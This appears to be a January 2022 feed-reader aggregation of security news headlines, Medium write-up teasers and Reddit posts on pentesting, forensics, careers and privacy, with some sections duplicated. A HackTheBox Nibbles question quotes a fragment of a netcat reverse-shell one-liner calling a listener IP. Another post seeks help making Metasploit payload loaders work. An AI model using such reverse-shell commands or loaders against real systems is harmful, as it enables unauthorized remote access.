    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Research on XML eXternal Entity Injection (XXE)-Cyber Sapiens Internship Task-10
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    Research on HTML Injection- Cyber Sapiens Internship Task-9
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 3 min )
    IDOR: A BEGINNER’S GUIDE
    IDOR is a type of access control vulnerability. IDOR vulnerability can occur when user-supplied input is received by the web server to ret Continue reading on Medium »  ( 2 min )
    How to remove crap using ‘cut’ cmd from Httprobe output?
    Default output from httprobe looks like; In certain conditions as ➖ Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-01-08 Review
    有用的无用模型:网络安全中复杂问题的建模方法 by ourren APT新趋势:战略性休眠域名利用率提升,检测困难 by ourren 2021年网络安全产业态势总结 by ourren 2021 年全球主要网络安全威胁发展态势 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    How does SAMBA differ between NULL authentication and anonymous authentication?
    Context: I am a penetration tester and I am trying to learn more deeply about SMB. I use the tool crackmapexec to enumerate SMB, and I recently came across something weird when trying the following commands: - crackmapexec smb IP This sets the Domain name, User name, and Host name to NULL - crackmapexec smb IP -u '' -p '' This sets the Domain name, but sets the User name, and Host name to NULL - crackmapexec smb IP -u 'anything' -p '' This sets the Domain name, User name, and Host name This made me wonder, why does SAMBA treat any username as an anonymous login? Question: I've been looking through the SAMBA documentation (which is horrible someone please change this), to find what allows/disallows NULL and anonymous authentication. However, I have been unable to find what settings allow these. submitted by /u/jakeyee [link] [comments]
    book suggestions for highly technical subjects
    Hi Reddit, I'm looking for books similar to The ShellCoder Handbook but with updated contents. I'm focused on the exploit dev part. But anything else is also fine as long as it's highly technical. submitted by /u/ak_z [link] [comments]
    Spyware paranoia and tools to use to scan
    I have been suspecting a long-term 'friend' of mine has been spying on me for a while now due to suspicious things they say and suspicious activity in general. Their motivation I suspect due to their personality and history (if they are indeed spying on me) is just to fuck with me or to gather information on me for later usage. I would like to know of any tools I can use to discover any keyloggers, screen capturers, or other types of spyware that can access my social media accounts, browser, or just my device in general. I have scanned my device with a malware scanner and windows defender already, but nothing major has been discovered. I'm wondering if I should do a rootkit scan as well? Thanks Edit: Obviously, I'm aware this is an unlikely scenario, but there have just been a lot of big 'coincidences' that have been bugging me and I'm trying to do some research. If you ignore the background story, I guess I'm just trying to find out current/relevant possible attack vectors/specific tools for low-level personal spying (hardware, software, and network-based). And then, the appropriate tools and methods a defender would use. I apologise that this seems to be the wrong subreddit but I would appreciate any redirects to relevant subreddits/external resources. submitted by /u/Large-Run9434 [link] [comments]
  • Open

    Project to Regularly and Automatically Update Docker Images that contains a lot of NetSec related tools
    submitted by /u/deleee [link] [comments]
  • Open

    被忽视的NTP安全
    时间是我们平时最关注,而最有不关注的问题,但是针对时间NTP协议的攻击所带来的危害是非常巨大的,需要引起我们的关注。

  • Open

    Timing-Based Username Enumeration: What’s a fix versus mitigation?
    For web-based applications, Timing-based Username Enumeration is a great find. For testers it’s low-hanging fruit and a great way to… Continue reading on Medium »
    December UI/UX Contest Winner
    and our $425 prize winner is…🏆 Continue reading on SW DAO »  ( 1 min )
    A Cool Account Takeover Vulnerability due to lack of Client Side Validation
    Hello Everyone, My Name is Arth Bajpai , I’m from Lucknow India and this is my First writeup related to bug bounty Continue reading on Medium »  ( 2 min )
    Tinyman Bug Bounty Campaign
    Tinyman announces bug bounty campaign. Continue reading on Medium »  ( 1 min )
    Being Anonymous on the Internet(proxychains)
    Proxy chains Continue reading on Medium »  ( 1 min )
    Bypassing Door Passwords
    Instead of a key, this type of lock system requires a numerical code to grant entry to a facility or property. The code is punched in by… Continue reading on Medium »  ( 1 min )
    GYSR Bug Bounty Program
    Our highest priority has always been safety and security. Introducing the GYSR bug bounty program in partnership with Immunefi. Continue reading on GYSR »  ( 1 min )
    XXE — TryHackme WriteUp
    XML External Entity Writeup Continue reading on InfoSec Write-ups »  ( 2 min )
    How i got financial advisor by simply hack into their membership plan !
    Hello Infosec geeks Continue reading on Medium »  ( 1 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time. Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Received a Performance Evaluation yesterday
    First time poster here. Previous post for context: https://www.reddit.com/r/SecurityCareerAdvice/comments/rc6awd/i_passed_iso_27001_at_the_company_i_work_for/ As the title says, I got a performance evaluation today with a raise! One thing they asked me to look into is to find credentials (IT Standards like 27K1) to improve the organization. We just passed ISO 27001, so I'm guessing they are looking to expand themselves with additional credentials (IT Standards like 27K1). Any ideas? FYI, the company is a software-as-a-service business. submitted by /u/LordCommanderTaurusG [link] [comments]  ( 1 min )
    Internal Log4J attempts?
    hey guys, I understand somewhat how the exploit works but when you see in the logs a log4j exploit attempt that is internal to internal attempting a request for an outside LDAP server. How could that happen exactly? As in how was that request made in the first place? Does it mean the internal machine was exploited or is it just a request attempt through another means? If the machine is not vulnerable to make outgoing requests, is it just a case of blocking the server IP? Or is the mere fact that an attempt was made indicate vulnerability? Hopefully that made sense! Thanks submitted by /u/_illusions25 [link] [comments]  ( 1 min )
    How best to send sensitive personal identity documents to new employer?
    Starting a new job remotely and they've hit me via email with the I-9 Form, W4, and Direct Deposit Paychex form. So the forms have my SSN, bank details and personal info + my passport as an additional identity document. How do I send this stuff responsibly? I was thinking I could password protect each PDF inside a zip file and then call them to give them the password. What software do I need to encrypt these PDFs? Any recommendations or advice on a best practice here? submitted by /u/ChampionSSJ [link] [comments]  ( 2 min )
    CISSP Advice
    Just like that title says, what advice would you give someone that will begin studying for this cert. Like is there a specific book, study guide/resources you’d recommend? I know there is a ton of material out there but some is hard to follow. Recent test takers advice is appreciated. Thanks! submitted by /u/zzizourm [link] [comments]  ( 3 min )
    CEH and CEH Master worth it
    is the CEH and CEH Practical worth taking if I am in my junior year in computer science? will it help at least land me an interview in a company? is it accredited in Canada? [Edit] Thank you so much for your comments, I will be shifting to eJPT and maybe CISSP after. submitted by /u/deadmeme-1 [link] [comments]  ( 4 min )
  • Open

    NPM might be executing malicious code in your CI without your knowledge
    submitted by /u/words_are_sacred [link] [comments]  ( 1 min )
    Mutual Authentication: A Component of Zero Trust
    submitted by /u/alexfornuto [link] [comments]
    Lopsided routing, a stealthy hole punch into FortiGate
    submitted by /u/oherrala [link] [comments]  ( 1 min )
    PHP 7.3-8.1 disable_functions bypass using string concatenation (PoC)
    submitted by /u/dradzenglor [link] [comments]
  • Open

    Bypass Cloudflare
    My leak bot https://twitter.com/leak_scavenger for a long time crawled the website ghostbin.co. Some of you asked how my bot is able to do… Continue reading on Medium »  ( 2 min )
    OSINT — Obter o E-mail de um Perfil do Linkedin
    Devido aos vazamentos de dados do Linkedin algumas informações como o ID e o E-mail do perfil do usuário foram disponibilizados no… Continue reading on 100security »  ( 1 min )
  • Open

    thefLink/Hunt-Sleeping-Beacons: Aims to identify sleeping beacons
    submitted by /u/dmchell [link] [comments]
    NOBELIUM’s EnvyScout infection chain goes in the registry, targeting embassies
    submitted by /u/dmchell [link] [comments]
    Bypassing Door Passwords w/wo default passwords
    submitted by /u/SocketPuppets [link] [comments]
    EDR Parallel-asis through Analysis - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Email threads about potatoes (recipes, etc)
    submitted by /u/ryankrage77 [link] [comments]
    Google drives were always a debatable content on this sub. Now it seems that the "don't be evil" firm will answer this question for you.
    https://www.techradar.com/news/google-drive-could-soon-start-locking-your-personal-files EDIT: For clarification, your personal data (I guess even copyrighted material) not publicly available (open) are not concerned. But the findings shared here may become more and more rare. submitted by /u/krazybug [link] [comments]  ( 2 min )
    Wide selection of fairly recent magazines, mostly English language, but also German, Dutch and others
    submitted by /u/Dutchlawyer [link] [comments]
    Christmas Movies
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Another music one
    submitted by /u/International_Milk_1 [link] [comments]
    VARIOUS (300 TBS OF STUFF. Tom and Jerry cartoons, K-pop music. courses on bitcoin, and video ediing. Excel for beginners. and so on.
    submitted by /u/International_Milk_1 [link] [comments]
    more music (Some empty folders)
    submitted by /u/International_Milk_1 [link] [comments]
    K-POP. METAL, ROCK
    submitted by /u/International_Milk_1 [link] [comments]
    MUSIC
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    SecWiki News 2022-01-07 Review
    《2021太空安全报告》 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    预计 2025 年,反病毒软件市场规模将达到 45.4 亿美元
    2025年,反病毒软件市场规模预计将达到45.4亿美元。  ( 1 min )
    FreeBuf早报 | 上海首笔数字人民币就业补贴落地;VMware 解决产品中堆溢出漏洞
    能将相应的数据验证和交叉比对,为打击违法犯罪提供信息支持。  ( 1 min )
    Bandit通关记录【linux基础命令学习】
    Bandit是一个学习Linux的网站,它采用游戏通关的方式来帮助我们学习linux基本使用的命令,十分适合没有基础或基础较弱的同学学习,本篇通关了所有关卡并对相关知识进行了记录和收集。  ( 1 min )
    时间定了!CIS 2021网络安全创新大会Spring·春日版来袭
    大会已正式定档于3月2日至3日在上海宝华万豪酒店举办。  ( 1 min )
    新人必看!关于dom型xss和反射型xss的区别
    这篇文章可以给新入坑的小白更好的理解xss漏洞,也通过这篇文章巩固一下我对xss的理解,如有不正确的地方欢迎各位师傅斧正。  ( 1 min )
    FreeBuf甲方群讨论 | 聊聊网络安全供应商整合(本期内含彩蛋话题)
    Gartner预测,网络安全供应商整合将成为2022年的行业趋势之一,大多数组织都将供应商整合视为提高安全性的途径。  ( 1 min )
    新年伊始,斗象科技收到2022年的第一次认可
    新的一年,斗象科技将勤修内功,以更加卓越的产品和服务,更好地完成各项任务。
    FreeBuf周报 | NoReboot恶意软件让iPhone假装关机;看视频时,黑客窃取信用卡信息
    我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    NoReboot恶意软件让iPhone假装关机
    该技术直接模拟了用户iPhone设备关机时的情景,禁用了大多数的物理反馈,因此iPhone看起来跟真的关机了一样。  ( 1 min )
    黑客盗窃加密货币使用了哪些“手段”?
    以下是有史以来五大加密货币盗窃案的汇总,或许能发现一些加密货币被盗的规律。  ( 1 min )
    FinalSite遭受勒索软件攻击,数千个学校网站无法访问
    近年来,学校已成为勒索攻击的热门目标,尤其是一些安全建设资金有限的K12学校。  ( 1 min )
    华米科技招聘高级安全工程师
    华米科技创立于2013年是一家全球领先的智能可穿戴创新公司,希望通过“云健康云服务+端可穿戴终端+芯芯片”的布局以科技的力量推动全球每个人享有更好的运动、健康及医疗服务。
    安全知识图谱 | Log4j事件云端数据分析
    实现高级威胁的精准和快速定位  ( 1 min )
    利用AppInfo RPC服务的UAC Bypass技术详解
    在我们先前的攻击技术研判中曾介绍了一种较新的UAC Bypass在野利用手法,本文将再次对其技术细节进行深入分析。  ( 1 min )
  • Open

    Detecting Web Attacks Using A Convolutional Neural Network
    Introduction  ( 4 min )
    Authorization bypass — Gmail
    About the vulnerability  ( 3 min )
    Day 4, CN-Network Topologies #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    [IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty
    Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the…  ( 2 min )
  • Open

    Detecting Web Attacks Using A Convolutional Neural Network
    Introduction  ( 4 min )
    Authorization bypass — Gmail
    About the vulnerability  ( 3 min )
    Day 4, CN-Network Topologies #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    [IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty
    Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the…  ( 2 min )
  • Open

    7+ Major Reasons to Hire a Red Team to Harden Your App Sec
    The growing cyberthreat landscape has brought a storm in the online marketplace. From the online studies and research, there were around… Continue reading on Medium »  ( 4 min )
  • Open

    Exploiting Redash instances with CVE-2021-41192
    Article URL: https://ian.sh/redash Comments URL: https://news.ycombinator.com/item?id=29834624 Points: 1 # Comments: 0  ( 5 min )
  • Open

    Is it possible to extract WhatsApp data from this type of scenario?
    Phone: Iphone XS (A12 chip) [Wipe data after 10 attempts is ON] Passcode: Unkown iOS Ver: 14.7 Mode: AFU WhatsApp: 2FA Active I have access to UFED, Oxygen, XRY also I have budget more tools if there is any tool that is capable of doing it. Thank you in advance. submitted by /u/wtfisgoingong1 [link] [comments]  ( 1 min )

  • Open

    Unprotected directory of [NSFW] videos and images from internet sex work
    submitted by /u/Shark_Octopus [link] [comments]
    Movies
    submitted by /u/International_Milk_1 [link] [comments]
    "Soul, Hip Hop, Rare Grooves, House and Jazz "
    submitted by /u/International_Milk_1 [link] [comments]
    EPISODES of StarTrek-NewVoyages.
    submitted by /u/International_Milk_1 [link] [comments]
    Capybaras
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    movie stills featuring reptiles and amphibians.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    The JNDI Strikes Back – Unauthenticated RCE in H2 Database Console
    submitted by /u/SRMish3 [link] [comments]
    Garlicshare - Private and secure file sharing over the Tor network
    submitted by /u/ILDVUCE [link] [comments]  ( 1 min )
    Announcing the first open source security tool for Heroku!
    submitted by /u/cloud-defender [link] [comments]
    SANS Christmas Challenge 2021 - Write-up
    submitted by /u/the-useless-one [link] [comments]  ( 1 min )
  • Open

    Imagining a live server
    I wanted to ask if there was a good way to create a forensic image of a server that can't be taken offline? ​ Thanks submitted by /u/Pizza_Eating_Robots [link] [comments]  ( 1 min )
    Any free practice images out there
    Hi people, I work within digital forensics and I'm currently off work with covid due to the nature of my job i cannot work from home and was wondering if theres any websites out there that provide disk images for fictional triage / investigation. Thanks in advance submitted by /u/LukeT1123 [link] [comments]  ( 1 min )
  • Open

    Good security certs to obtain for better progression
    Hi I have been working in the information security industry for around 2 years now and recently secured a permanent role in the UK. My roadmap for this year is to obtain security certs and this is what I am planning: CompTIA Security+ Microsoft Azure Fundementals What advice do you have to reach a £75K+ salary in the next two to three years? Thanks submitted by /u/gavxz [link] [comments]  ( 1 min )
    Technicalities in VPN effectivity: Can anyone online tell when you're using a VPN?
    If a VPN disguises your IP address when you use the internet, do internet providers and the websites you visit realise that you're using a VPN or do they get the perfect impression that you're a normal internet user from wherever it is you go with your VPN. For reference, here are a few scenarios where your cover could be compromised: An internet user using an internet company only functional in Australia would be in say, Pakistan through a VPN. You lose your connection to your VPN more than once on the same website (so you're switching back and forth between locations in seconds) trackers could not only realise that you're using a VPN but also know your actual location. (It may not be the case that this is how VPN works but:) Among its many available locations, say for example you chose NY, USA, if a VPN provider simply transports all its users choosing NY, USA to one precise location in NY, wouldn’t it be clear that all that activity coming from one spot, down to the coordinate isn’t really thousands of computers crammed in one area but people using the same VPN service. I have loads of thoughts on how if someone really really wanted to find your location, they could definitely do so, and how even small windows of error are subject to great scrutiny online. However, it's all dependant on how much of my speculation is actually true. Cheers! This question has been posted on other relevant subreddits as well. submitted by /u/lazariomo [link] [comments]  ( 3 min )
    Digital certificates: why do the certificates not get stolen?
    I am probably missing something here, but I don't get how digital certificates prove the identity of whoever has them. Granted, if someone decrypts a certificate with the public key of a certificate authority and retreives the public key of a certain party, they can know for sure that this authority once signed the certificate request for said party, but can't any given person retreive that certificate from that party, and then start providing it as if it was their own? submitted by /u/Pegasus9208 [link] [comments]  ( 3 min )
    HackTheBox Nibbles: Full TTY Shell how?
    So I'm reading a walkthrough of Nibbles from 0xdf and they used a PHP code like: &1|nc 10.10.15.154 8082 >/tmp/f"); ?> I was stuck for hours trying to get a full TTY shell, and none of the guides on breaking out of limited shell has worked. Clearly, 0xdf knew what he was doing. I want to learn more about what this command is doing: Where does one learn how to do this? Is there more of where this comes from? (I'd like to learn more so I can note it down) What is the logic behind this? Why is this superior to the reverse shell PHP I crafted using MSFVENOM? I'd like to be provided a fishing rod and a lake, rather than the fish. I'd like to learn how to do these things before I read up on how somebody else did it. I'm also okay with paid resources on the subject (books, courses, subscription), as I believe content creators should be paid for their skill and time. submitted by /u/DiickBenderSociety [link] [comments]  ( 1 min )
    Who is hosting the most malware?
    I would like to know from your experience where have you seen the most malware, most often, if you would have to choose between IBM networks, DigitalOcean, Microsoft, ATT, Google, Akamai, Github and Amazon networks? submitted by /u/ciovlici [link] [comments]  ( 2 min )
    How do I start building the security team?
    Hello everyone, I'm currently working on a small startup company as the one of the 5 people as admin / engineer / architech / security people / printer fixer / security analyst I realize that the team is quickly burnt out with the variety of task and mountains of unending work on this state. I talk to my boss about this and he agree that something needs to be done. We are planning to hire a third party vendor to do some of the stuff. However, my boss is quite adamant that the security roles muat be done in house and ask me to create a plan on how many division we need to create, how many people to hire etc. Is there any guide out there that can help me with this in CIS style with focus on scalability? So for example in small organization you need at least these teams, later on you can add these teams etc. Or can you guys share how did your organization tackle this challenge? Any input is greatly appreciated. Thanks for sharing submitted by /u/XynderK [link] [comments]  ( 4 min )
  • Open

    Grafana LFI on https://grafana.mariadb.org
    MariaDB disclosed a bug submitted by realtess: https://hackerone.com/reports/1419213
  • Open

    Another simple .NET executable to create and add a backdoor user
    Another simple but useful .NET executable that creates and adds an arbitrary user or domain user to the Local Administrators groups. Very useful for privilege escalations on Windows (i.e. unquoted service path) Repo: https://github.com/notdodo/LocalAdminSharp submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
    Cobalt Strike Sleep Mask IOC
    https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs ​ Recently noticed an IOC of the sleep mask kit while testing my own payloads, being the hook on the sleep() winapi. submitted by /u/CodeXTF2 [link] [comments]
    What Is Red Teaming, How Does It Work and Why Is It Important?
    submitted by /u/stanley9528 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-06 Review
    某系统漏洞挖掘之固件分析 by ourren DataCon2021域名体系安全赛道黑产方向赛题深度解析 by ourren 浅谈数据安全运营能力建设 by ourren 2021年“CCF优秀博士学位论文奖”列表及全文 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Utilizando BBRF com foco em Reconnaissance #bugbounty
    Olá tudo bem? Continue reading on Medium »  ( 4 min )
    My First Bug Bounty Report | POST-based XSS
    Hello Ninjas!!!! I am Vishal Barot aka vFlexo and today I decided to publish a write-up on how I got first bounty through my first ever… Continue reading on Medium »  ( 2 min )
    Authorization bypass — Gmail
    About the vulnerability Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Advanced Searching with Google Dorking
    What is Google Dorking? Continue reading on Medium »  ( 2 min )
    Writeup_TryHackMe_Searchlight — IMINT
    As part of OSINT learning, I am working to complete all the Try_Hack_Me rooms which are linked to OSINT research. Continue reading on Medium »
  • Open

    Kerberos Authentication (again… but better)
    On of the most known authentication protocol in Windows environment is Kerberos (RFC 1510 for the V5). Continue reading on Medium »
    What is a red team
    In a red team/blue team cybersecurity simulation, the red team acts as an adversary, attempting to identify and exploit potential… Continue reading on Medium »  ( 3 min )
    CompTIA ITF+
    I was fortunate that the CompTIA ANZ Business Technology Community & Horden Technologies offered a free, entry-level qualification for… Continue reading on Medium »  ( 1 min )
  • Open

    APT新趋势:战略性休眠域名利用率提升,检测困难
    攻击者越来越倾向于提前注册域名备用,利用这类战略性休眠域名的攻击越来越多。  ( 1 min )
    红日安全靶场三
    目标是要拿到win2012域控服务器中的一份文件。  ( 1 min )
    私人订制,打造白帽子专用移动系统
    为了能够做好针对恶意样本的分析,本文分享一种新型思路——私人订制,打造白帽子专用移动系统!  ( 1 min )
    十大最常见的ATT&CK战术及技术
    Picus研究人员从各种来源收集了超过二十万真实世界威胁样本,确定了样本的战术、技术和程序(TTP),并对每个TTP进行了分类,所有样本超过180万种ATT&CK技术。  ( 1 min )
    FreeBuf 早报 | 诈骗者冒充经纪商骗取投资者5000万美元;购物和网贷诈骗最常见
    “电商刷单,让你在家动动手指就能赚钱”“跟着老师炒股赚大钱”……在网上,用户经常能从各类软件推送中收到类似的消息,这些诱人的“馅饼”背后,却是危险的“陷阱”。  ( 1 min )
    CISA《网络安全事件和漏洞响应手册》提到的SSVC是什么?
    作为一种新的漏洞评估方法,SSVC的特点主要体现为三个“面向”:面向供应链、面向决策结果、面向实践经验。  ( 1 min )
    密码套件:密码,算法和协商安全设置(一)
    但确实密码套件在我们通过Internet建立的每个HTTPS连接中都起着至关重要的作用。  ( 1 min )
    谷歌出手,5 亿美元“拿下”以色列网络安全公司 Siemplify
    路透社披露谷歌旗下云计算部门完成收购以色列网络安全公司Siemplify。  ( 1 min )
    探寻新能量,安全新未来 | 首届「网安新势力」 大会官网正式上线
    第一届「网安新势力」大会官网今天正式上线啦,还不赶紧报名!  ( 1 min )
    本田和讴歌汽车受千年虫影响,时钟倒退到2002年
    本田和讴歌是否真的会让车主等待7个月的时间才能修复这一漏洞吗?
    研究人员揭露了一个长期潜伏的金融盗窃团伙——Elephant Beetle
    该团伙以交易处理系统为目标,从拉美地区的金融实体中窃取资金至少长达4年。  ( 1 min )
    告别脚本小子系列丨JAVA安全(2)——JAVA反编译技巧
    告别脚本小子系列是本公众号新开的一个集代码审计、安全研究和漏洞复现的专题,意在帮助大家更深入的理解漏洞原理和掌握漏洞挖掘的思路和技巧。我们将由浅入深的对java安全相关的技术进行讲解。  ( 1 min )
    数据统计:网络安全事件造成影响及成本
    软件安全是网络安全的基础防线,这也提醒我们从软件开发开始就应重视代码安全建设,提高软件安全性。  ( 1 min )
    Git信息泄露原理解析及利用总结
    在配置不当的情况下,可能会将“.git”文件直接部署到线上环境,这就造成了git泄露问题。  ( 1 min )
  • Open

    Vulnhub: MoneyBox 1 Walkthrough
    I dropped here again to give you my another writeup (wrote 5 months ago!) of the box from vulnhub MoneyBox 1. You can read my blog on…  ( 4 min )
    Vulnhub: Crossroads 1 Walkthrough
    Wuahahahhahaha! Sneaking in again to leave another writeup for ya of the box from vulnhub Crossroads 1. Have a look at my last blog which I…  ( 5 min )
    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF?  ( 4 min )
    Vulnhub: VulnOS 2 Walkthrough
    Hey everyone, here’s a write-up of the box from vulnhub VulnOS 2. I wrote this writeup 5 months ago and am curious to share my notes (how I…  ( 7 min )
    Vulnhub: Pwned 1 Walkthrough
    Back again with the next write-up of the box from vulnhub Pwned 1. You can read the blog I just publish a few moments ago, Vulnhub: VulnOS…  ( 6 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below:  ( 1 min )
  • Open

    Vulnhub: MoneyBox 1 Walkthrough
    I dropped here again to give you my another writeup (wrote 5 months ago!) of the box from vulnhub MoneyBox 1. You can read my blog on…  ( 4 min )
    Vulnhub: Crossroads 1 Walkthrough
    Wuahahahhahaha! Sneaking in again to leave another writeup for ya of the box from vulnhub Crossroads 1. Have a look at my last blog which I…  ( 5 min )
    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF?  ( 4 min )
    Vulnhub: VulnOS 2 Walkthrough
    Hey everyone, here’s a write-up of the box from vulnhub VulnOS 2. I wrote this writeup 5 months ago and am curious to share my notes (how I…  ( 7 min )
    Vulnhub: Pwned 1 Walkthrough
    Back again with the next write-up of the box from vulnhub Pwned 1. You can read the blog I just publish a few moments ago, Vulnhub: VulnOS…  ( 6 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below:  ( 1 min )
  • Open

    'DoorLock' Vulnerability Can Force iOS Devices to Endlessly Reboot
    Article URL: https://www.pcmag.com/news/doorlock-vulnerability-can-force-ios-devices-to-endlessly-reboot Comments URL: https://news.ycombinator.com/item?id=29819095 Points: 2 # Comments: 0  ( 5 min )

  • Open

    Anyone use X1 to capture Facebook and are you having issues with it right now?
    Just wondering if it's just me. It's only capturing images on the first page, the rest are blank. I've tried 4 times today submitted by /u/ShadowsWandering [link] [comments]  ( 1 min )
    Automated approach to Memory Analysis
    Hello all, So we’re on a Project and being the sole one to do the task, I was wondering if there’s to some extent we can automate the Memory Analysis part! Currently, I do it using Volatility Framework! I came across Volatility Bot, but saw it was last pushed 5 years back, so step aside! Any leads could really help me in! Thanks submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    Investigating an employee
    Hello, Not sure if this is the correct location. If I'm to investigate an employee for not working during work hours, or someone with suspicious login activities, what common places will you be investigating? E.g. checking browser histories. Physical security (login/logout time) Docs created on DMS (files opened, accessed, etc. Recently printed docs? In other words, to know what a person is doing at work, what activities (or logs) should I be searching? submitted by /u/ram3nboy [link] [comments]  ( 1 min )
  • Open

    Staging Cobalt Strike with mTLS using Caddy — Improsec | improving security
    submitted by /u/dmchell [link] [comments]
    Can You Trust a File’s Digital Signature? New Zloader Campaign exploits Microsoft’s Signature Verification putting users at risk - Check Point Research
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    Which protocols allow authentication with AD passwords?
    SMB - 445. WINRM - 5985/6. RDP - 3389. WMI - 135/9. RPC - 5001. Ldap - 389 What more? submitted by /u/henadar [link] [comments]
    Metasploit payloads dont work with custom loaders
    Hello, im taking a course by Sektor7. i have the problem that, no matter in which way i try, i cant get a metasploit payload executed correctly by any loader (cpp) in the course. The program run, but there was no meterpreter session opened no more What I tried: Simple xor encryption and decryption Simple AES encryption and decryption Even base64 encoding doesnt work for me I also tried to research the root of the problem with no success. The source I used already was fixed for all problems any debugger gave me: The python script for aes encryption: https://pastebin.com/Qyxa3Zrr The cpp loader that decrypts and runs the payload in memory: https://pastebin.com/MfVynd45 the compiler (a custom batch): https://pastebin.com/rn6zXfqi I already tried to generate a PE with msfvenom and run it through the python, did not work. I tried to generate the raw payload with msfvenom, then encrypt it manually and put in aes key and payload into the cpp, didnt work. I tried to generate with -f raw -o 1.bin, then run the .bin through the python, didnt work. Note: Only the provided shellcodes by Sektor7 seem to work flawlessly. These have no other function besides executing the calc.exe from the System32 folder or showing basic messages. Maybe the sheer size of metasploit generated payloads or its custom functions make them going broken during the cryption and compilation process? If yes, why and how to design the loaders they dont break the payload? submitted by /u/janameyers2002 [link] [comments]  ( 2 min )
  • Open

    Is to late to change path?
    Hi, I am a sysadmin from 8 years now i am thinking to change my career path in network & security. Because i see my colleagues in the security field and started to like more and more. So my question is where to start? submitted by /u/lisi_dx [link] [comments]  ( 1 min )
    Is there any valid reason to disallow special characters from a password?
    Was helping my partner’s parents set up a password manager and they found that their bank does not allow special characters in their password. None. To me this is a red flag that indicates they aren’t sanitizing their database inputs and could be vulnerable to SQL injection. But is that overly paranoid? Is there a legitimate reason to disallow special characters? (For the record I recommended they use a long passphrase) submitted by /u/furikakebabe [link] [comments]  ( 4 min )
    A random user on omegle said my name
    Honestly a lil freaked out rn cause a random user on omegle guessed my name within 10 seconds of getting matched there. He was like “i know everything about you” and i thought he was just trolling. But then dude proceeded to say my name.He got my age wrong. I got freaked out and immediately disconnected. I don’t know much about these things. Should i be worried? Am i hacked? submitted by /u/Indecisive-blahblah [link] [comments]  ( 3 min )
    Can anyone track a deleted gmail account?
    The police are already involved in this manner, and they’ve told me it’s okay to seek outside help from any individual or a cyber forensic PI company. At my job there’s an anonymous individual that’s been sending harmful misinformation about several of my colleagues. They made a Gmail account, sent emails out to many people, and deleted the account. These emails have ruined many lives. Unfortunately the police can’t do anything, but they said once we get a positive ID we can proceed with charging them with stalking, harassment, and defamation. Just to reiterate, law enforcement is involved, and they’ve given me permission to go this route in apprehending the suspect. Could anyone assist in helping me track down the user so that I may forward the information to the police? I’ll pay. submitted by /u/deathbygoat [link] [comments]  ( 6 min )
    Could malware listen for cryptocurrency mnemonics through our devices - and what is the likelihood?
    Cryptocurrencies are often secured by a "mnemonic" which is a list of words selected from a set of 2048 standard words. If this mnemonic is compromised, all the funds can be stolen. Hypothetically, malware could listen for these 2048 keywords through the microphones on our laptops and mobile phones. Upon detecting these keywords, it could send a recording to the hacker. I'm asking this because personally I was writing down my mnemonic and then realised I had spoken the words as I was writing. My phone and laptop were in my room with me. There is no way to change my mnemonic currently, so I am hoping it has not been compromised. Do you think this kind of hack is plausible, or likely, or is it a slim possibility? Please be honest. Thank you for your time. submitted by /u/netsec-microphone-Q [link] [comments]  ( 2 min )
    Which FW brand / model do you respect or even impress you?
    Hi, The background is that I recently found out that my old Mikrotik RB750GL at home went out of support over a year ago. Since I just botched the PAN PA-200 I got for free from a friend it hit me: I have no idea what brands to avoid and what brands have a sound strategy and nice customer support for non enterprise customers. While I appreciate model recommendations my curiousity is more about a discussion about brands / models that are positioned for non commercial envirnment and the power user market... the why and why nots. Is there some functionality that you are surprised still isn't implemented in FWs far below the enterpris market? Is there a brand that you will do almost anything to avoid? Is there model that should be crowned as the Bernie Madoff of firewalls? I am thinking about SOHO applicance box that Is below / around $200 Is not "compile OpenBSD on it and use VI to...." as close to set and forget as you dare Handles at least 100Mbps internet connectivity (and gigabit routing on the internal net if there's multiple ports) Netflix, Gmail etc etc needs to work without configuring every client Deal with 2-4 users that thinks "port" has something to do with ships VLAN capability Simple to use VPN like Wireguard Smart addon services that might be on a yearly / monthly basis that really is worth it? submitted by /u/mindlight [link] [comments]  ( 4 min )
